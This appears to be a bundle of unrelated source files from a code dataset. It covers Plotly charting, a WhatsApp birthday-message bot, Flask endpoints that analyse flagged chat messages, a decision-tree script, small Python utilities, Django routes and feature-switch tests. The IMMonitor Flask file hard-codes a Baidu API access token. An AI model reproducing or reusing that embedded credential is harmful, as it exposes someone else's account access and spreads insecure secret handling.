'lines',\n name = 'Rotation'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_4'].tolist(),\n mode = 'lines',\n name = 'Bend'),\n go.Scatter(\n x = time,\n y = df['actual_qdd_5'].tolist(),\n mode = 'lines',\n name = 
'Twist') \n ])\n\n layout_five = dict(title = 'Graph of Joint Accelerations vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'Joint Accelerations(rad/s2)'),\n )\n \n # sixth chart plots tcp force vs time as a line chart\n graph_six = []\n \n graph_six.append(\n \n go.Scatter(\n x = time,\n y = df['tcp_force_scalar'].tolist(),\n mode = 'lines',\n name = 'force')\n )\n\n layout_six = dict(title = 'Graph of TCP Force vs Time',\n xaxis = dict(title = 'Time'),\n yaxis = dict(title = 'TCP Force(N)'),\n )\n \n\n # seventh chart plots percentage of the different'safety mode' occurrences as a bar chart \n graph_seven = []\n \n classes = df['safety_mode'].unique()\n \n safety_mode_list = []\n \n for label in classes:\n safety_mode_list.append(len(df[df['safety_mode']==label]) / len(df) * 100)\n\n graph_seven.append(\n go.Bar(\n x = classes,\n y = safety_mode_list,\n )\n )\n\n layout_seven = dict(title = 'Safety Mode Types Occurrence (%)',\n xaxis = dict(title = 'Safety Mode Type',),\n yaxis = dict(title = 'Occurrence (%)'),\n )\n\n # eigth chart plots occurrence of protective stops vs time \n graph_eight = []\n \n df = pd.get_dummies(df, columns=['safety_mode'])\n \n safety_mode_list = []\n \n\n graph_eight.append(\n \n go.Scatter(\n x = time,\n y = df['safety_mode_protective_stop'].tolist(),\n mode = 'lines',\n name = 'P.S.')\n )\n\n\n layout_eight = dict(title = 'Protective Stop Occurrences',\n xaxis = dict(title = 'Time',),\n yaxis = dict(title = 'Occurrence'),\n )\n\n \n # append all charts to the figures list\n figures = []\n figures.append(dict(data=graph_one[0], layout=layout_one))\n figures.append(dict(data=graph_two[0], layout=layout_two))\n figures.append(dict(data=graph_three[0], layout=layout_three))\n figures.append(dict(data=graph_four[0], layout=layout_four))\n figures.append(dict(data=graph_five[0], layout=layout_five))\n # only 1 scatter plot in graph 6, so no need to index 0\n figures.append(dict(data=graph_six, layout=layout_six))\n # only 1 bar plot\n figures.append(dict(data=graph_seven, layout=layout_seven))\n # only 1 scatter plot\n figures.append(dict(data=graph_eight, layout=layout_eight))\n\n return figures\n","sub_path":"wrangling_scripts/wrangle_data.py","file_name":"wrangle_data.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"265462658","text":"from selenium import webdriver\nimport time\nfrom datetime import datetime\nimport pyautogui\n\n# get current date\nnow = datetime.now()\n\n# set the date and time format\ndate_format = \"%m-%d-%Y %H:%M:%S\"\n\n# convert string to actual date and time\ntime1 = datetime.strptime(now.strftime('%m-%d-%Y %H:%M:%S'), date_format)\ntime2 = datetime.strptime('8-14-2019 00:00:01', date_format)\n\ndiff = time2 - time1\n\nprint(str(diff.seconds))\n\n\nbrowser = webdriver.Chrome('chromedriver')\n\nbrowser.get('https://web.whatsapp.com/')\ntime.sleep(10)\ndo = browser.find_element_by_xpath('//*[@id=\"pane-side\"]/div[1]/div/div/div[1]')\ndo.click()\n\ntime.sleep(diff.seconds)\n\ndo = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]')\ndo.send_keys('Hallo Linus, über die nächste Zeit werden etliche Nachrichten von einem selbstgeschriebenem Programm geschickt. Ich wünsche dir einen ...')\npyautogui.press('enter')\n\n# Declare array holding tons of translations of \"happy birthday\"\n\nhappy_birthday = [\"wunderbaren Geburtstag!\", \"happy birthday! - Englisch\", \"հիանալի ծննդյան օր! 
- Armenisch\", \"un magnifique anniversaire! - Französisch\", \"in prachtige jierdei! - Friesisch\", \"ένα θαυμάσιο γενέθλιο! - Griechisch\", \"lā hānau maikaʻi! - Hawaiianisch\", \"멋진 생일 - Koreanisch\", \"un maravilloso cumpleaños! - Spanisch\", \"wspaniałe urodziny! - Polnisch\", \"прекрасный день рождения! - Russisch\"]\n\nfor xhappy in happy_birthday:\n find_path = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]')\n find_path.send_keys(xhappy)\n pyautogui.press('enter')\n time.sleep(600)\n\n#time.sleep(3)\n#browser.quit()\n","sub_path":"LinusGeburtstagsgeschenk.py","file_name":"LinusGeburtstagsgeschenk.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"346503199","text":"import re\n\nfrom flask import Blueprint, jsonify, request\nfrom sqlalchemy import and_\n\nfrom IMMonitor import app, ret_val\nfrom IMMonitor.db.common import db\nfrom IMMonitor.analysis.model import MsgDetectResult\nfrom IMMonitor.analysis import msg_detect\nfrom IMMonitor.analysis.model import MsgDetectResult\nfrom IMMonitor.wx.model import WxGroupMessage\n\n\nACCESS_TOKEN = '24.5066b60e5aa6af8577c4aadaec727cd8.2592000.1546587768.282335-15056684'\nDETECT_URL_IMG = 'https://aip.baidubce.com/rest/2.0/solution/v1/img_censor/user_defined'\nDETECT_URL_TEXT = 'https://aip.baidubce.com/rest/2.0/antispam/v2/spam'\n\nbp_analysis = Blueprint('bp_analysis', __name__)\n\n\n# @app.route('/analysis/text_dectect')\n# def text_dectect():\n# text = '明天去天安门闹事'\n# detect_result = msg_detect.detect_text(text)\n# detect_result = msg_detect.unify_detect_result(msg_type='Text', msg_id='123456', result=detect_result)\n# MsgDetectResult.batch_insert(detect_result)\n#\n# return jsonify({\n# 'ok': 'ok'\n# })\n\n\n# 2.识别每个群违规信息关键词,绘制词云图\n@app.route('/analysis/msg_keywords')\ndef msg_keywords():\n \"\"\"\n 识别并统计每个群违规信息关键词\n :return:\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n # 数据库交互,取出每条违规消息敏感词列表\n keywords = db.session.query(MsgDetectResult.result_info, WxGroupMessage)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n keywords_list = []\n for keyword in keywords:\n keywords_list += keyword[0].split(',')\n keywords_dict = {}\n # 桶排序统计每条违规消息敏感词频数\n for key_word in keywords_list:\n if not keywords_dict.get(key_word):\n keywords_dict[key_word] = 1\n else:\n keywords_dict[key_word] = keywords_dict[key_word] + 1\n\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=keywords_dict))\n\n\n# 3.每个群成员发送违规消息量统计\n@app.route('/analysis/member_danger')\ndef member_danger():\n \"\"\"\n 统计指定群成员发送违规消息量\n :return:\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n # 数据库交互,取出发出每条违规消息的成员名列表\n danger_list = db.session.query(MsgDetectResult, WxGroupMessage.FromUserNickName)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n member_list = {}\n # 桶排序实现群成员违规消息统计\n for danger in danger_list:\n UserNickName = danger[1]\n if not member_list.get(UserNickName):\n member_list[UserNickName] = 1\n else:\n member_list[UserNickName] = member_list[UserNickName] + 1\n\n return 
jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=member_list))\n\n\n# 4. 统计单个群消息总数,每种违规消息(比如暴恐,色情,政治敏感等)数量\n@app.route('/analysis/group_danger')\ndef group_danger():\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n\n danger_list = db.session.query(WxGroupMessage, MsgDetectResult)\\\n .filter(and_(WxGroupMessage.group_id == group_id,\n WxGroupMessage.MsgId == MsgDetectResult.msg_id)).all()\n\n label_dict = {'1': 0, '2': 0, '3': 0, '4': 0, '8': 0, '21': 0, '22': 0, '23': 0, '24': 0, '25': 0}\n # img_type = {'1': '色情', '2': '性感', '3': '暴恐', '4': '恶心', '8': '政治人物'}\n # text_label = {'21': '暴恐违禁', '22': '文本色情', '23': '政治敏感', '24': '恶意推广', '25': '低俗辱骂'}\n # 违禁信息类别融合\n # '色情性感': # 1 + 2 + 22\n # '暴恐违禁': # 3 + 21\n # '政治敏感': # 8 + 23\n # '低俗辱骂': # 25\n # '恶心反感': # 4 +24\n group_danger_dict = {'色情性感': 0, '暴恐违禁': 0, '政治敏感': 0, '低俗辱骂': 0, '恶心反感': 0}\n for danger in danger_list:\n label_dict[str(danger[1].result_label)] += 1\n group_danger_dict['色情性感'] = label_dict['1'] + label_dict['2'] + label_dict['22']\n group_danger_dict['暴恐违禁'] = label_dict['3'] + label_dict['21']\n group_danger_dict['政治敏感'] = label_dict['8'] + label_dict['23']\n group_danger_dict['低俗辱骂'] = label_dict['25']\n group_danger_dict['恶心反感'] = label_dict['4'] + label_dict['24']\n\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=group_danger_dict))\n\n\n# 5.单个群每天各时段违规消息占比变化趋势图\n@app.route('/analysis/datetime_danger')\ndef datetime_danger():\n \"\"\"\n 单个群每天各时段违规消息数量\n :return: 每天违规消息数量和每天中各小时的违规消息数量\n \"\"\"\n args = request.args\n label = args.get('label')\n group_id = args.get('group_id')\n\n if not all([label, group_id]):\n return jsonify(ret_val.gen(ret_val.CODE_PARAMS_ERR, extra_msg='需要传入label和group_id参数'))\n\n # 数据库交互,取出发出每条违规消息的成员名列表\n date_time_list = db.session.query(MsgDetectResult, WxGroupMessage.date_created)\\\n .filter(and_(WxGroupMessage.group_id == group_id, MsgDetectResult.msg_id == WxGroupMessage.MsgId)).all()\n\n danger_dict = {\"day\": 0, \"hour\": 0}\n danger_day_dict = {}\n danger_hour_dict = {}\n # 桶排序实现群成员违规消息统计\n for time in date_time_list:\n # time[1]: 2019-03-09 11:14:47.574616\n # 统计每一天的违规消息数量\n date_temp = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2})\", str(time[1]))\n day = date_temp.group(0)\n if not danger_day_dict.get(day):\n danger_day_dict[day] = 1\n else:\n danger_day_dict[day] += 1\n # 统计每天中各小时的违规消息数量\n hour_temp = re.search(r\"(\\d{1,2}:\\d{1,2})\", str(time[1]))\n hour = hour_temp.group(1).split(\":\")[0]\n if not danger_hour_dict.get(hour):\n danger_hour_dict[hour] = 1\n else:\n danger_hour_dict[hour] += 1\n\n danger_dict['day'] = danger_day_dict\n danger_dict['hour'] = danger_hour_dict\n return jsonify(ret_val.gen(ret_val.CODE_SUCCESS, data=danger_dict))\n\n","sub_path":"IMMonitor/analysis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"554321896","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 5 11:02:03 2016\n\n@author: zp4wo\n\"\"\"\n##using code in py27\n\n\n'''\nimport pandas as pd\nimport numpy as np\n\n\n#loading data\n\ntxn_data = pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//database//csv_Files//processed data//trx//CH_RC_spending_Y12toY15_0504_updated.csv')\ndays_labels = 
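The keyword and per-member tallies in the IMMonitor views above hand-roll the same bucket-counting dictionary loop three times; collections.Counter in the standard library expresses it in one call. A sketch with stand-in data, since the real lists come from the database queries in the record:

from collections import Counter

keywords_list = ['spam', 'scam', 'spam']  # stand-in for the flat keyword list built in msg_keywords()
keywords_dict = dict(Counter(keywords_list))
print(keywords_dict)  # {'spam': 2, 'scam': 1}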
pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0504//days_labels.csv')\nseason_labels = pd.read_excel('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0503//df_all_labels.xlsx', encoding='utf-8')\n\n#keep S1415 data\ntxn_data_S1415 = txn_data[txn_data.FY == 'S1415']\n\n# days labels\ndays_labels_keep = days_labels[['KeyID','card_holder_no','Date', 'Days_labels']]\n\n# season and segment labels\nseason_labels_keep = season_labels[['KeyID','card_holder_no','labels', 'comb_labels']]\ndf_merge1 = pd.merge(txn_data_S1415, days_labels_keep, on=['KeyID','card_holder_no','Date'], how='left')\ndf_merge2 = pd.merge(df_merge1, season_labels_keep, on=['KeyID','card_holder_no'], how='left')\n\n# only keeping the base txn\n# also excluding banquet, since we don't use banquet to generate days lables and recreation labels\n\nind_base = df_merge2['labels'].notnull()\nind_banquet = df_merge2.Category_type == 'Banquet'\ndf_txn = df_merge2[ind_base & ~ind_banquet]\n\n#%%\n#adding prework ect labels\n\n#==============================================================================\n# Day night time\n#==============================================================================\nimport copy\n\ndf_txn.start_datetime = pd.to_datetime(df_txn.start_datetime)\ndf_come_time = copy.deepcopy(df_txn)\n\ncome_time = df_come_time.groupby(['KeyID', 'card_holder_no', 'Date']).min()['start_datetime'].dropna()\ndf_come_time = come_time.to_frame()\n#df_come_time.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0505//df_come_time.csv')\n#%%\nind_early_then_9 = (df_come_time.start_datetime.apply(lambda x: x.hour) < 9)\nind_12to14 = (df_come_time.start_datetime.apply(lambda x: x.hour) > 12) & (df_come_time.start_datetime.apply(lambda x: x.hour) <14)\nind_9to12 = (df_come_time.start_datetime.apply(lambda x: x.hour) >= 9) & (df_come_time.start_datetime.apply(lambda x: x.hour) <= 12)\nind_14to17 = (df_come_time.start_datetime.apply(lambda x: x.hour) >= 14) & (df_come_time.start_datetime.apply(lambda x: x.hour) <= 17)\nind_after_17 = (df_come_time.start_datetime.apply(lambda x: x.hour) > 17)\n\n#%%\n#@todo\n#adding labels here\ndf_come_time.loc[ind_early_then_9, 'come_time_labels'] = 'pre_work'\ndf_come_time.loc[ind_12to14, 'come_time_labels'] = 'lunch_time'\ndf_come_time.loc[ind_9to12 | ind_14to17, 'come_time_labels'] = 'work_hour'\ndf_come_time.loc[ind_after_17, 'come_time_labels'] = 'after_work'\n\n#%%\ndf_come_time_ = df_come_time.drop('start_datetime', axis=1).reset_index()\ndf_txn_ = pd.merge(df_txn, df_come_time_, on=['KeyID','card_holder_no','Date'], how='left')\ndf_txn_.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//df_txn_.csv', index=0)\n'''\n\n#%%\nimport pandas as pd\nimport numpy as np\ndf_txn_ = pd.read_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//df_txn_.csv')\n\n#%%\n#running models of DT\n#date prepare\n# only for core HV/racegoing\nlist_ = ['Category_type','day_of_week','location', 'comb_labels', 'labels', 'come_time_labels']\ndataset = df_txn_[list_]\ndataset['come_time_labels'].fillna('unknown', inplace=1)\ndataset_HV = dataset[dataset['labels'] == '2. core HV']\ndataset_RG = dataset[dataset['labels'] == '3A. 
Racegoing']\n\ndataset_HV.drop('labels', inplace=1, axis=1)\ndataset_RG.drop('labels', inplace=1, axis=1)\n\ndataset_HV.dropna(subset=['Category_type', 'comb_labels'], inplace=1)\ndataset_RG.dropna(subset=['Category_type', 'comb_labels'], inplace=1)\n\n#%%\n#core HV dataset\ndef model(dataset):\n\timport copy\n\tdata = copy.deepcopy(dataset)\n\t\n\tfrom sklearn import tree\n\tfrom sklearn import preprocessing\n\t\n\tdata_X = data[['Category_type', 'day_of_week', 'location', 'come_time_labels']]\n\tdata_y = data[['comb_labels']]\n\t\n\tle1 = preprocessing.LabelEncoder()\n\tle2 = preprocessing.LabelEncoder()\n\tle3 = preprocessing.LabelEncoder()\n\tle4 = preprocessing.LabelEncoder()\n\tle5 = preprocessing.LabelEncoder()\n\t\n\t\n\tle1.fit(data_X['Category_type'])\n\tle2.fit(data_X['day_of_week'])\n\tle3.fit(data_X['location'])\n\tle4.fit(data_X['come_time_labels'])\n\tle5.fit(data_y['comb_labels'])\n\n\t\n\tdata_X.loc[:, 'Category_type'] = le1.transform(data_X['Category_type'])\n\tdata_X.loc[:, 'day_of_week'] = le2.transform(data_X['day_of_week'])\n\tdata_X.loc[:, 'location'] = le3.transform(data_X['location'])\n\tdata_X.loc[:, 'come_time_labels'] = le4.transform(data_X['come_time_labels'])\n\t\n\tdata_y.loc[:, 'comb_labels'] = le5.transform(data_y['comb_labels'])\n\t\n\tclf = tree.DecisionTreeClassifier(\n\t\t\tmax_leaf_nodes=10,\n\t\t\t)\n\tclf_ = clf.fit(data_X, data_y)\n\tclass1 = le1.classes_\n\tclass2 = le2.classes_\n\tclass3 = le3.classes_\n\tclass4 = le4.classes_\n\tclass5 = le5.classes_\n\n\treturn clf_, class1, class2, class3, class4, class5\n\nclf_HV_op = model(dataset_HV)\nclf_RG_op = model(dataset_RG)\n\nclf_HV = clf_HV_op[0]\nclf_RG = clf_RG_op[0]\n\n\n#%%\n\nfeature_names = ['Category_type', 'day_of_week', 'location', 'come_time_labels']\nclass_name = ['1.FB_only', '2.FB_paid', '3.FB_free', '4.FB_free_paid',\n '5.Free_paid', '6.Free_only', '7.Paid_only']\n\ndef output_pdf(clf_, name):\n#\tfrom IPython.display import Image\n\tfrom sklearn import tree\n\tfrom sklearn.externals.six import StringIO\n\timport pydot_ng as pydot\n\tdot_data = StringIO()\n\ttree.export_graphviz(clf_, out_file=dot_data, \n\t feature_names=feature_names, \n\t class_names=class_name, \n\t filled=True, rounded=True, \n\t special_characters=True,\n\t\t\t\t\t node_ids=1,\n\t\t\t\t\t proportion=1) \n\tgraph = pydot.graph_from_dot_data(dot_data.getvalue()) \n\t\n\tgraph.write_pdf(\"C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//%s.pdf\"%name)\n\noutput_pdf(clf_HV, name='HV_tree')\noutput_pdf(clf_RG, name='RG_tree')\n\n#%%\n#Returns the index of the leaf that each sample is predicted as.\n\ndef data_prepare(dataset):\n\timport copy\n\tfrom sklearn import preprocessing\n\t\n\tdata = copy.deepcopy(dataset)\n\t\n\tdata_X = data[['Category_type', 'day_of_week', 'location', 'come_time_labels']]\n\tdata_y = data[['comb_labels']]\n\t\n\tle1 = preprocessing.LabelEncoder()\n\tle2 = preprocessing.LabelEncoder()\n\tle3 = preprocessing.LabelEncoder()\n\tle4 = preprocessing.LabelEncoder()\n\tle5 = preprocessing.LabelEncoder()\n\t\n\t\n\tle1.fit(data_X['Category_type'])\n\tle2.fit(data_X['day_of_week'])\n\tle3.fit(data_X['location'])\n\tle4.fit(data_X['come_time_labels'])\n\tle5.fit(data_y['comb_labels'])\n\t\n\tdata_X.loc[:, 'Category_type'] = le1.transform(data_X['Category_type'])\n\tdata_X.loc[:, 'day_of_week'] = le2.transform(data_X['day_of_week'])\n\tdata_X.loc[:, 'location'] = le3.transform(data_X['location'])\n\tdata_X.loc[:, 'come_time_labels'] = 
le4.transform(data_X['come_time_labels'])\n\t\n\tdata_y.loc[:, 'comb_labels'] = le5.transform(data_y['comb_labels'])\n\treturn data_X, data_y\n\nHV_X, HV_y = data_prepare(dataset_HV)\nRG_X, RG_y = data_prepare(dataset_RG)\n\nindex_leaf_1 = clf_HV.apply(HV_X)\nindex_leaf_2 = clf_RG.apply(RG_X)\n\ndataset_HV.loc[:, 'node_labels'] = index_leaf_1\ndataset_RG.loc[:, 'node_labels'] = index_leaf_2\n\n#%%\ndataset_HV.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//dataset_HV.csv', index=0,encoding='utf-8')\ndataset_RG.to_csv('C://Users//zp4wo//Documents//HKJC_edit//memberprofile2015//output//0506//dataset_RG.csv', index=0,encoding='utf-8')\n\n\n\n\n\n\n\n\n\n\n","sub_path":"py27/DT_py27_0505.py","file_name":"DT_py27_0505.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563537261","text":"from .timeseries import NotEnoughDataException\n\n\nclass MovingAverage:\n def __init__(self, series, timespan):\n self.series = series\n self.timespan = timespan\n\n def value_on(self, end_date):\n moving_average_range = self.series.get_closing_price_list(end_date, self.timespan)\n if len(moving_average_range) < self.timespan:\n raise NotEnoughDataException(\"Not enough data\")\n price_list = [item.value for item in moving_average_range]\n return sum(price_list) / len(price_list)\n","sub_path":"src/stock_alerter/movingaverage.py","file_name":"movingaverage.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"509154068","text":"import os\nimport time\nfrom multiprocessing import Process\n\n\ndef play_music():\n print(\"子进程p1:\", os.getpid())\n for i in range(5):\n print('play music ...')\n time.sleep(1)\n\n\ndef play_lol():\n print(\"子进程p2:\", os.getpid())\n for i in range(5):\n print('play lol ...')\n time.sleep(1)\n\n\nif __name__ == '__main__':\n print('主进程:', os.getpid())\n start_time = time.time()\n p1 = Process(target=play_music)\n p2 = Process(target=play_lol)\n # p1.daemon = True # 默认值是False,当为True的时候,主进程结束,会强制结束子进程\n # p2.daemon = True\n p1.start() # 操作系统 启动一个进程 用来运行target=play_music 的 进程,子进程 (不是完整的代码)\n # p1.join() # 上面的代码任务没有执行完,不会运行下面的代码\n p2.start()\n print(help(p2))\n # p1.join()\n # p2.join()\n\n # p1 p2 都结束后再 计算时间\n # while True:\n # if p1.is_alive() or p2.is_alive():\n # time.sleep(1)\n # else:\n # break\n end_time = time.time()\n print(end_time - start_time)\n\n # 怎么才能保证让主进程最后再结束呢? 用join\n # 主进程: 进程基础.py (代码) python.exe 进程基础.py 运行的时候, 操作系统会 分一个进程, 这个进程我们称为主进程\n # p1.daemon\n # is_alive()","sub_path":"py_08day/进程基础.py","file_name":"进程基础.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"352571413","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n * Created by kevin on 10/30/16.\r\n\"\"\"\r\nfrom django.conf.urls import url\r\n\r\nfrom . 
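The multiprocessing demo above ends by asking, in its commented-out block, how to guarantee the parent process finishes last and how to time the children correctly; Process.join() is the answer it hints at. A self-contained sketch (the work function and its tags are illustrative, not from the record):

import time
from multiprocessing import Process

def work(tag):
    for _ in range(3):
        print(tag, 'working ...')
        time.sleep(1)

if __name__ == '__main__':
    start = time.time()
    p1 = Process(target=work, args=('music',))
    p2 = Process(target=work, args=('lol',))
    p1.start()
    p2.start()
    p1.join()  # block until p1 exits
    p2.join()  # block until p2 exits
    # measured only after both children finish, so the parent ends last
    print('elapsed:', time.time() - start)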
import views\r\n\r\napp_name = 'front'\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index_view, name='index'),\r\n url(r'^contact$', views.contact_view, name='contact'),\r\n url(r'^search/$', views.search_view, name='search'),\r\n url(r'^download$', views.download, name='download'),\r\n url(r'^links', views.links, name='links'),\r\n url(r'^search_page$', views.search, name='search_page'),\r\n]\r\n","sub_path":"IncMiGe_new/front/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"247984028","text":"import datetime\n\nimport pytest\nfrom freezegun import freeze_time\n\nfrom its_on.models import switches\n\n\nasync def test_switches_list_without_auhtorize(setup_tables_and_data, client):\n response = await client.get('/zbs/switches')\n\n assert response.status == 401\n\n\nasync def test_update_switch_without_login(setup_tables_and_data, client):\n response = await client.post('/zbs/switches/1', data={'version': 'some_shit'})\n\n assert response.status == 401\n\n\n@pytest.mark.parametrize('switch_title, expected_result', [\n ('switch1', True),\n ('switch2', True),\n ('switch1488', False),\n])\nasync def test_switches_list(setup_tables_and_data, client, login, switch_title, expected_result):\n response = await client.get('/zbs/switches')\n\n content = await response.content.read()\n\n assert (switch_title in content.decode('utf-8')) is expected_result\n\n\nasync def test_switch_detail(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches/1')\n\n content = await response.content.read()\n\n assert switch.name in content.decode('utf-8')\n\n\n@freeze_time(datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc))\nasync def test_switch_add(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches/add')\n content = await response.content.read()\n\n assert 'Flag adding' in content.decode('utf-8')\n\n switch_data = {\n 'name': 'switch_to_check_add',\n 'is_active': True,\n 'groups': 'check_adding, group2, ,,',\n 'version': 1,\n 'comment': 'This is the story of a big bad wolf an little girl whose name was Little Red Riding Hood',\n }\n response = await client.post('/zbs/switches/add', data=switch_data)\n content = await response.content.read()\n\n assert 'Switches list' in content.decode('utf-8')\n\n switch_data['is_hidden'] = False\n\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.select().where(switches.c.name == switch_data['name']))\n created_switch = await result.first()\n\n for field_name, field_value in switch_data.items():\n if field_name == 'groups':\n field_value = list(\n filter(None, [item.strip() for item in field_value.split(',')]),\n )\n assert getattr(created_switch, field_name) == field_value\n\n assert created_switch.created_at == datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)\n\n\nasync def test_switch_update(setup_tables_and_data, client, login, switch):\n with freeze_time('2020-08-15'):\n await client.post('/zbs/switches/1', data={'is_active': False})\n\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.select().where(switches.c.id == 1))\n updated_switch = await result.first()\n\n assert updated_switch.is_active is False\n assert updated_switch.created_at == datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)\n assert updated_switch.updated_at == datetime.datetime(2020, 8, 15, 
tzinfo=datetime.timezone.utc)\n\n\nasync def test_switch_soft_delete(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch7' in content.decode('utf-8')\n\n await client.get('/zbs/switches/7/delete')\n\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch7' not in content.decode('utf-8')\n\n\nasync def test_resurrect_switch(setup_tables_and_data, client, login, switch):\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch3' in content.decode('utf-8')\n\n await client.get('/zbs/switches/3/delete')\n\n response = await client.get('/zbs/switches')\n content = await response.content.read()\n\n assert 'switch3' not in content.decode('utf-8')\n\n switch_data = {\n 'name': 'switch3',\n 'is_active': False,\n 'is_hidden': False,\n 'groups': 'group1',\n 'version': 4,\n }\n response = await client.post('/zbs/switches/add', data=switch_data)\n content = await response.content.read()\n\n assert 'switch3' in content.decode('utf-8')\n\n\nasync def test_switches_copy_without_auhtorize(setup_tables_and_data, client):\n response = await client.post('/zbs/switches/copy')\n\n assert response.status == 401\n\n\n@pytest.mark.parametrize(\n ('http_get_arguments', 'old_switch_is_active_expected', 'expected_updated_at'), [\n ('', True, datetime.datetime(2020, 4, 15, tzinfo=datetime.timezone.utc)),\n ('?update_existing=true', False, datetime.datetime(2020, 10, 15, tzinfo=datetime.timezone.utc)),\n ],\n)\n@freeze_time(datetime.datetime(2020, 10, 15, tzinfo=datetime.timezone.utc))\n@pytest.mark.usefixtures('setup_tables_and_data', 'get_switches_data_mocked_existing_switch')\nasync def test_switches_copy_existing_switch_foo(\n client, login,\n http_get_arguments, old_switch_is_active_expected, expected_updated_at,\n):\n response = await client.post(f'/zbs/switches/copy{http_get_arguments}')\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(switches.count())\n switches_count = await result.first()\n switches_count = switches_count[0]\n\n result = await conn.execute(switches.select().where(switches.c.name == 'switch7'))\n old_switch = await result.first()\n\n assert response.status == 200\n assert switches_count == 7\n assert old_switch.is_active == old_switch_is_active_expected\n assert old_switch.updated_at == expected_updated_at\n\n\n@pytest.mark.usefixtures('setup_tables_and_data', 'get_switches_data_mocked_new_switch')\nasync def test_switches_copy_new_switch(client, login):\n response = await client.post('/zbs/switches/copy')\n async with client.server.app['db'].acquire() as conn:\n result = await conn.execute(\n switches.select().where(switches.c.name == 'extremely_new_switch'))\n new_switch = await result.first()\n\n assert response.status == 200\n assert new_switch is not None\n assert new_switch.name == 'extremely_new_switch'\n","sub_path":"tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"259143619","text":"from mock import Mock\nimport unittest\nimport uuid\n\nfrom beeline.trace import _should_sample, SynchronousTracer\n\nclass TestTraceSampling(unittest.TestCase):\n def test_deterministic(self):\n ''' test a specific id that should always work with the given sample rate '''\n trace_id = 
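The its_on admin tests above pin created_at/updated_at with freezegun in both decorator and context-manager form; the pattern in isolation, reusing the dates from the tests:

import datetime

from freezegun import freeze_time

@freeze_time('2020-04-15')
def created_now():
    return datetime.datetime.now()

with freeze_time('2020-08-15'):
    updated = datetime.datetime.now()

assert created_now().date() == datetime.date(2020, 4, 15)
assert updated.date() == datetime.date(2020, 8, 15)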
